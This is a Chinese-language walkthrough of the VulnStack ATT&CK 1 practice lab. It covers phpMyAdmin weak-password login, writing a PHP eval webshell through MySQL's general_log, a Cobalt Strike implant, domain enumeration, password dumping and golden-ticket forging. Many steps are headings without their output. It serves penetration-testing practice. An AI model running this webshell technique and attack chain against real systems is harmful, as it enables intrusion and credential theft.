VulnStack ATT & CK 1 靶场
环境
信息收集
端口探测
只开放了 80
、 3306
目录扫描
访问 80 端口,发现首页为 PHP
探针:
目录扫描:
发现 phpmyadmin。
漏洞挖掘
phpmyadmin 尝试若口令登录: root:root
登录成功。
phpmyadmin 后台的 getshell 方法有很多种 先看下常规的 select into outfile
:
这里 secure_file_priv
为 null
,不允许写入写出。 放弃此方法,尝试 MySQL
通用查询日志 general_log
写出 webshell
。 先看下全局变量的配置 show global variables like '%general%'
:
这里并没有开启通用日志,那我就自己打开,并自定义保存文件:
SET GLOBAL general_log = 'ON'
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/shell.php'
这里的绝对路径是通过前面的探针获取到的。
然后写 webshell select '<?php @eval($_POST["bbll]);?>'
:
蚁剑连接:
内网渗透
首先查看系统位数:
wmic cpu get addresswidth
用 cs 生成木马,上传:
执行:
上线,直接是管理员权限:
查看用户权限:
查看当前登录域:
查看域内用户:
查看域内主机:
查看域管:
dump 密码:
横向移动
DC 上线后,使用 hashdump
dump krbtgt NTLM Hash:
制作黄金票据:
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论